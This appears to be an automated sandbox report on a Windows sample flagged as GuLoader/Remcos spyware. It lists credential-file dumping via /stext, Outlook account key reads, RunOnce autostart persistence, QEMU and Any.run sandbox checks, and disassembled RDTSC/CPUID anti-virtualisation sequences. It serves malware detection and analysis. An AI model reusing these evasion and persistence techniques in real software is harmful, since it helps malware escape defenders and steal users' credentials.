      Source: loKmeabs9V.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@9/4@1/3
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeFile created: C:\Users\user\AppData\Roaming\remcosJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeMutant created: \Sessions\1\BaseNamedObjects\Remcos-FAZALZ
      Source: C:\Users\user\Desktop\loKmeabs9V.exeFile created: C:\Users\user\AppData\Local\Temp\~DF2A65A40B0FC83CF5.TMPJump to behavior
      Source: loKmeabs9V.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\loKmeabs9V.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Users\user\Desktop\loKmeabs9V.exeSystem information queried: HandleInformation
      Source: C:\Users\user\Desktop\loKmeabs9V.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\loKmeabs9V.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: loKmeabs9V.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
      Source: loKmeabs9V.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
      Source: loKmeabs9V.exe, 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
      Source: loKmeabs9V.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
      Source: loKmeabs9V.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
      Source: loKmeabs9V.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
      Source: loKmeabs9V.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
      Source: loKmeabs9V.exeVirustotal: Detection: 20%
      Source: loKmeabs9V.exeReversingLabs: Detection: 13%
      Source: C:\Users\user\Desktop\loKmeabs9V.exeFile read: C:\Users\user\Desktop\loKmeabs9V.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\loKmeabs9V.exe 'C:\Users\user\Desktop\loKmeabs9V.exe'
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess created: C:\Users\user\Desktop\loKmeabs9V.exe 'C:\Users\user\Desktop\loKmeabs9V.exe'
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess created: C:\Users\user\Desktop\loKmeabs9V.exe C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\syqduvyml'
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess created: C:\Users\user\Desktop\loKmeabs9V.exe C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\cawvvojfhdxf'
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess created: C:\Users\user\Desktop\loKmeabs9V.exe C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\fubgoguhvlpsyny'
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess created: C:\Users\user\Desktop\loKmeabs9V.exe 'C:\Users\user\Desktop\loKmeabs9V.exe'
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess created: C:\Users\user\Desktop\loKmeabs9V.exe C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\syqduvyml'
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess created: C:\Users\user\Desktop\loKmeabs9V.exe C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\cawvvojfhdxf'
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess created: C:\Users\user\Desktop\loKmeabs9V.exe C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\fubgoguhvlpsyny'
      Source: C:\Users\user\Desktop\loKmeabs9V.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
      Source: C:\Users\user\Desktop\loKmeabs9V.exeFile opened: C:\Users\user\Desktop\loKmeabs9V.cfg
      Source: C:\Users\user\Desktop\loKmeabs9V.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

      Data Obfuscation:

      Detected unpacking (changes PE section rights)
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Unpacked PE file: 22.2.loKmeabs9V.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Unpacked PE file: 23.2.loKmeabs9V.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Unpacked PE file: 24.2.loKmeabs9V.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
      Yara detected GuLoader
      Source: Yara match File source: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 22_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 0_2_00404DCC push edx; iretd
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 0_2_004059BD push F32E5D69h; retf
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 22_2_0044693D push ecx; ret
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 22_2_0044DB70 push eax; ret
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 22_2_0044DB70 push eax; ret
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 22_2_00451D54 push eax; ret
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 23_2_00414060 push eax; ret
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 23_2_00414060 push eax; ret
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 23_2_00414039 push ecx; ret
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 23_2_004164EB push 0000006Ah; retf
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 23_2_00416553 push 0000006Ah; retf
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 23_2_00416555 push 0000006Ah; retf
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 24_2_00444355 push ecx; ret
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 24_2_004446D0 push eax; ret
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 24_2_004446D0 push eax; ret
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 24_2_0044AC84 push eax; ret
      Source: initial sample Static PE information: section name: .text entropy: 7.07623900315
      Source: initial sample Static PE information: section name: .text entropy: 7.07623900315
      Source: C:\Users\user\Desktop\loKmeabs9V.exe File created: C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.exe

      Boot Survival:

      Creates autostart registry keys with suspicious values (likely registry only malware)
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.vbs
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.vbs
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 24_2_004047C6 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      Contains functionality to detect hardware virtualization (CPUID execution measurement)
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 0_2_022B0BC7 TerminateProcess,
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 0_2_022B36C3
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 0_2_022B8923
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 0_2_022B5DAE
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 0_2_022B87E3 NtWriteVirtualMemory,
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)
      Source: C:\Users\user\Desktop\loKmeabs9V.exe RDTSC instruction interceptor: First address: 00000000022B88DF second address: 00000000022B88F0 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a sub byte ptr [eax], 00000016h 0x0000000d pushad 0x0000000e lfence 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\loKmeabs9V.exe RDTSC instruction interceptor: First address: 00000000022B62EB second address: 00000000022B62EB instructions:
      Source: C:\Users\user\Desktop\loKmeabs9V.exe RDTSC instruction interceptor: First address: 00000000022B73B0 second address: 00000000022B73B0 instructions:
      Source: C:\Users\user\Desktop\loKmeabs9V.exe RDTSC instruction interceptor: First address: 00000000022B71DE second address: 00000000022B71DE instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp bx, dx 0x0000000d jne 00007F72D4EAA1F5h 0x0000000f push dword ptr [esp+04h] 0x00000013 call 00007F72D4EAA40Bh 0x00000018 pushad 0x00000019 nop 0x0000001a nop 0x0000001b mov eax, 00000001h 0x00000020 cpuid 0x00000022 popad 0x00000023 mov ebx, dword ptr [esp+04h] 0x00000027 xor ecx, ecx 0x00000029 add ecx, 02h 0x0000002c cmp word ptr [ebx+ecx], 0000h 0x00000031 jne 00007F72D4EAA218h 0x00000033 add ecx, 02h 0x00000036 cmp word ptr [ebx+ecx], 0000h 0x0000003b jne 00007F72D4EAA218h 0x0000003d add ecx, 02h 0x00000040 cmp word ptr [ebx+ecx], 0000h 0x00000045 jne 00007F72D4EAA218h 0x00000047 add ecx, 02h 0x0000004a cmp word ptr [ebx+ecx], 0000h 0x0000004f jne 00007F72D4EAA218h 0x00000051 add ecx, 02h 0x00000054 cmp word ptr [ebx+ecx], 0000h 0x00000059 jne 00007F72D4EAA218h 0x0000005b add ecx, 02h 0x0000005e cmp word ptr [ebx+ecx], 0000h 0x00000063 jne 00007F72D4EAA218h 0x00000065 add ecx, 02h 0x00000068 cmp word ptr [ebx+ecx], 0000h 0x0000006d jne 00007F72D4EAA218h 0x0000006f retn 0004h 0x00000072 sub ecx, 02h 0x00000075 add eax, 02h 0x00000078 cmp esi, 68CDCEE6h 0x0000007e mov bx, word ptr [eax+ecx] 0x00000082 mov dx, word ptr [esi+ecx] 0x00000086 pushad 0x00000087 rdtsc
      Source: C:\Users\user\Desktop\loKmeabs9V.exe RDTSC instruction interceptor: First address: 00000000022B2448 second address: 00000000022B2448 instructions:
      Source: C:\Users\user\Desktop\loKmeabs9V.exe RDTSC instruction interceptor: First address: 0000000000562448 second address: 0000000000562448 instructions:
      Source: C:\Users\user\Desktop\loKmeabs9V.exe RDTSC instruction interceptor: First address: 0000000000565FAF second address: 0000000000565FAF instructions:
      Source: C:\Users\user\Desktop\loKmeabs9V.exe RDTSC instruction interceptor: First address: 0000000000569DDA second address: 0000000000569DDA instructions:
      Tries to detect Any.run
      Source: C:\Users\user\Desktop\loKmeabs9V.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\loKmeabs9V.exe File opened: C:\Program Files\qga\qga.exe
      Source: C:\Users\user\Desktop\loKmeabs9V.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\loKmeabs9V.exe File opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: loKmeabs9V.exe, 00000000.00000002.336058548.00000000022C0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL\YOURPHONE.EXE\SUBFOLDER1SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCESTARTUP KEY
      Source: loKmeabs9V.exe, 00000000.00000002.336058548.00000000022C0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\loKmeabs9V.exe RDTSC instruction interceptor: First address: 00000000022B7F30 second address: 00000000022B7F30 instructions: 0x00000000 rdtsc 0x00000002 mov eax, A494EE6Bh 0x00000007 xor eax, 6C4D1677h 0x0000000c xor eax, 6E4EF001h 0x00000011 xor eax, A697081Ch 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007F72D4EAA22Ah 0x0000001e lfence 0x00000021 mov edx, 2EA7C992h 0x00000026 xor edx, 079D8C51h 0x0000002c xor edx, 2142E10Eh 0x00000032 xor edx, 7786A4D9h 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d cmp dx, ax 0x00000040 ret 0x00000041 sub edx, esi 0x00000043 ret 0x00000044 cmp cl, dl 0x00000046 add edi, edx 0x00000048 dec dword ptr [ebp+000000F8h] 0x0000004e cmp dword ptr [ebp+000000F8h], 00000000h 0x00000055 jne 00007F72D4EAA208h 0x00000057 test eax, ebx 0x00000059 call 00007F72D4EAA26Fh 0x0000005e call 00007F72D4EAA24Bh 0x00000063 lfence 0x00000066 mov edx, 2EA7C992h 0x0000006b xor edx, 079D8C51h 0x00000071 xor edx, 2142E10Eh 0x00000077 xor edx, 7786A4D9h 0x0000007d mov edx, dword ptr [edx] 0x0000007f lfence 0x00000082 cmp dx, ax 0x00000085 ret 0x00000086 mov esi, edx 0x00000088 pushad 0x00000089 rdtsc
      Source: C:\Users\user\Desktop\loKmeabs9V.exe RDTSC instruction interceptor: First address: 00000000022B7F7B second address: 00000000022B7F7B instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 012985CBh 0x00000013 xor eax, 524C1329h 0x00000018 add eax, C04F8477h 0x0000001d sub eax, 13B51B58h 0x00000022 cpuid 0x00000024 test dx, bx 0x00000027 bt ecx, 1Fh 0x0000002b jc 00007F72D4A95E56h 0x00000031 popad 0x00000032 call 00007F72D4A958CFh 0x00000037 lfence 0x0000003a rdtsc
      Source: C:\Users\user\Desktop\loKmeabs9V.exe RDTSC instruction interceptor: First address: 00000000022B88DF second address: 00000000022B88F0 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a sub byte ptr [eax], 00000016h 0x0000000d pushad 0x0000000e lfence 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\loKmeabs9V.exe RDTSC instruction interceptor: First address: 00000000022B88F0 second address: 00000000022B8A77 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b cmp eax, 6AACECEFh 0x00000010 mov eax, dword ptr [esp+1Ch] 0x00000014 mov byte ptr [eax], 00000006h 0x00000017 xor byte ptr [eax], 00000055h 0x0000001a add byte ptr [eax], 00000051h 0x0000001d sub byte ptr [eax], 0000003Ah 0x00000020 mov byte ptr [eax+01h], FFFFFFD2h 0x00000024 xor byte ptr [eax+01h], 00000000h 0x00000028 cmp ah, dh 0x0000002a xor byte ptr [eax+01h], FFFFFFEEh 0x0000002e jmp 00007F72D4A957D9h 0x00000033 cmp cl, 00000013h 0x00000036 add byte ptr [eax+01h], FFFFFFC4h 0x0000003a mov byte ptr [eax+02h], 0000007Eh 0x0000003e cmp bx, 1188h 0x00000043 xor byte ptr [eax+02h], 00000067h 0x00000047 cmp ax, 000008E1h 0x0000004b cmp ax, cx 0x0000004e xor byte ptr [eax+02h], FFFFFFD8h 0x00000052 pushad 0x00000053 mov al, 9Ah 0x00000055 cmp al, 9Ah 0x00000057 jne 00007F72D4A9693Bh 0x0000005d popad 0x0000005e sub byte ptr [eax+02h], 00000009h 0x00000062 mov edx, dword ptr [ebp+00000138h] 0x00000068 mov dword ptr [eax+03h], edx 0x0000006b pushad 0x0000006c mov eax, 000000EDh 0x00000071 cpuid 0x00000073 popad 0x00000074 mov byte ptr [eax+07h], FFFFFFE2h 0x00000078 xor byte ptr [eax+07h], 00000026h 0x0000007c sub byte ptr [eax+07h], FFFFFF9Fh 0x00000080 xor byte ptr [eax+07h], FFFFFFDAh 0x00000084 test al, al 0x00000086 test dh, ch 0x00000088 mov byte ptr [eax+08h], 0000001Dh 0x0000008c xor byte ptr [eax+08h], FFFFFFACh 0x00000090 add byte ptr [eax+08h], 00000028h 0x00000094 sub byte ptr [eax+08h], 00000009h 0x00000098 cmp dx, B8CFh 0x0000009d pushad 0x0000009e mov edx, 0000005Dh 0x000000a3 rdtsc
      Source: C:\Users\user\Desktop\loKmeabs9V.exe RDTSC instruction interceptor: First address: 00000000022B62EB second address: 00000000022B62EB instructions:
      Source: C:\Users\user\Desktop\loKmeabs9V.exe RDTSC instruction interceptor: First address: 00000000022B73B0 second address: 00000000022B73B0 instructions:
      Source: C:\Users\user\Desktop\loKmeabs9V.exe RDTSC instruction interceptor: First address: 00000000022B71DE second address: 00000000022B71DE instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp bx, dx 0x0000000d jne 00007F72D4EAA1F5h 0x0000000f push dword ptr [esp+04h] 0x00000013 call 00007F72D4EAA40Bh 0x00000018 pushad 0x00000019 nop 0x0000001a nop 0x0000001b mov eax, 00000001h 0x00000020 cpuid 0x00000022 popad 0x00000023 mov ebx, dword ptr [esp+04h] 0x00000027 xor ecx, ecx 0x00000029 add ecx, 02h 0x0000002c cmp word ptr [ebx+ecx], 0000h 0x00000031 jne 00007F72D4EAA218h 0x00000033 add ecx, 02h 0x00000036 cmp word ptr [ebx+ecx], 0000h 0x0000003b jne 00007F72D4EAA218h 0x0000003d add ecx, 02h 0x00000040 cmp word ptr [ebx+ecx], 0000h 0x00000045 jne 00007F72D4EAA218h 0x00000047 add ecx, 02h 0x0000004a cmp word ptr [ebx+ecx], 0000h 0x0000004f jne 00007F72D4EAA218h 0x00000051 add ecx, 02h 0x00000054 cmp word ptr [ebx+ecx], 0000h 0x00000059 jne 00007F72D4EAA218h 0x0000005b add ecx, 02h 0x0000005e cmp word ptr [ebx+ecx], 0000h 0x00000063 jne 00007F72D4EAA218h 0x00000065 add ecx, 02h 0x00000068 cmp word ptr [ebx+ecx], 0000h 0x0000006d jne 00007F72D4EAA218h 0x0000006f retn 0004h 0x00000072 sub ecx, 02h 0x00000075 add eax, 02h 0x00000078 cmp esi, 68CDCEE6h 0x0000007e mov bx, word ptr [eax+ecx] 0x00000082 mov dx, word ptr [esi+ecx] 0x00000086 pushad 0x00000087 rdtsc
      Source: C:\Users\user\Desktop\loKmeabs9V.exe RDTSC instruction interceptor: First address: 00000000022B2448 second address: 00000000022B2448 instructions:
      Source: C:\Users\user\Desktop\loKmeabs9V.exe RDTSC instruction interceptor: First address: 0000000000567F30 second address: 0000000000567F30 instructions: 0x00000000 rdtsc 0x00000002 mov eax, A494EE6Bh 0x00000007 xor eax, 6C4D1677h 0x0000000c xor eax, 6E4EF001h 0x00000011 xor eax, A697081Ch 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007F72D4EAA22Ah 0x0000001e lfence 0x00000021 mov edx, 2EA7C992h 0x00000026 xor edx, 079D8C51h 0x0000002c xor edx, 2142E10Eh 0x00000032 xor edx, 7786A4D9h 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d cmp dx, ax 0x00000040 ret 0x00000041 sub edx, esi 0x00000043 ret 0x00000044 cmp cl, dl 0x00000046 add edi, edx 0x00000048 dec dword ptr [ebp+000000F8h] 0x0000004e cmp dword ptr [ebp+000000F8h], 00000000h 0x00000055 jne 00007F72D4EAA208h 0x00000057 test eax, ebx 0x00000059 call 00007F72D4EAA26Fh 0x0000005e call 00007F72D4EAA24Bh 0x00000063 lfence 0x00000066 mov edx, 2EA7C992h 0x0000006b xor edx, 079D8C51h 0x00000071 xor edx, 2142E10Eh 0x00000077 xor edx, 7786A4D9h 0x0000007d mov edx, dword ptr [edx] 0x0000007f lfence 0x00000082 cmp dx, ax 0x00000085 ret 0x00000086 mov esi, edx 0x00000088 pushad 0x00000089 rdtsc
      Source: C:\Users\user\Desktop\loKmeabs9V.exe RDTSC instruction interceptor: First address: 0000000000567F7B second address: 0000000000567F7B instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 012985CBh 0x00000013 xor eax, 524C1329h 0x00000018 add eax, C04F8477h 0x0000001d sub eax, 13B51B58h 0x00000022 cpuid 0x00000024 test dx, bx 0x00000027 bt ecx, 1Fh 0x0000002b jc 00007F72D4A95E56h 0x00000031 popad 0x00000032 call 00007F72D4A958CFh 0x00000037 lfence 0x0000003a rdtsc
      Source: C:\Users\user\Desktop\loKmeabs9V.exe RDTSC instruction interceptor: First address: 00000000005688F0 second address: 0000000000568A77 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b cmp eax, 6AACECEFh 0x00000010 mov eax, dword ptr [esp+1Ch] 0x00000014 mov byte ptr [eax], 00000006h 0x00000017 xor byte ptr [eax], 00000055h 0x0000001a add byte ptr [eax], 00000051h 0x0000001d sub byte ptr [eax], 0000003Ah 0x00000020 mov byte ptr [eax+01h], FFFFFFD2h 0x00000024 xor byte ptr [eax+01h], 00000000h 0x00000028 cmp ah, dh 0x0000002a xor byte ptr [eax+01h], FFFFFFEEh 0x0000002e jmp 00007F72D4EAA309h 0x00000033 cmp cl, 00000013h 0x00000036 add byte ptr [eax+01h], FFFFFFC4h 0x0000003a mov byte ptr [eax+02h], 0000007Eh 0x0000003e cmp bx, 1188h 0x00000043 xor byte ptr [eax+02h], 00000067h 0x00000047 cmp ax, 000008E1h 0x0000004b cmp ax, cx 0x0000004e xor byte ptr [eax+02h], FFFFFFD8h 0x00000052 pushad 0x00000053 mov al, 9Ah 0x00000055 cmp al, 9Ah 0x00000057 jne 00007F72D4EAB46Bh 0x0000005d popad 0x0000005e sub byte ptr [eax+02h], 00000009h 0x00000062 mov edx, dword ptr [ebp+00000138h] 0x00000068 mov dword ptr [eax+03h], edx 0x0000006b pushad 0x0000006c mov eax, 000000EDh 0x00000071 cpuid 0x00000073 popad 0x00000074 mov byte ptr [eax+07h], FFFFFFE2h 0x00000078 xor byte ptr [eax+07h], 00000026h 0x0000007c sub byte ptr [eax+07h], FFFFFF9Fh 0x00000080 xor byte ptr [eax+07h], FFFFFFDAh 0x00000084 test al, al 0x00000086 test dh, ch 0x00000088 mov byte ptr [eax+08h], 0000001Dh 0x0000008c xor byte ptr [eax+08h], FFFFFFACh 0x00000090 add byte ptr [eax+08h], 00000028h 0x00000094 sub byte ptr [eax+08h], 00000009h 0x00000098 cmp dx, B8CFh 0x0000009d pushad 0x0000009e mov edx, 0000005Dh 0x000000a3 rdtsc
      Source: C:\Users\user\Desktop\loKmeabs9V.exe RDTSC instruction interceptor: First address: 0000000000562448 second address: 0000000000562448 instructions:
      Source: C:\Users\user\Desktop\loKmeabs9V.exe RDTSC instruction interceptor: First address: 0000000000565FAF second address: 0000000000565FAF instructions:
      Source: C:\Users\user\Desktop\loKmeabs9V.exe RDTSC instruction interceptor: First address: 0000000000569D77 second address: 0000000000569D95 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov eax, B8F5A615h 0x00000010 xor eax, 6BC0978Fh 0x00000015 sub eax, FE90C053h 0x0000001a pushad 0x0000001b lfence 0x0000001e rdtsc
      Source: C:\Users\user\Desktop\loKmeabs9V.exe RDTSC instruction interceptor: First address: 0000000000569DDA second address: 0000000000569DDA instructions:
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 0_2_022B962D rdtsc
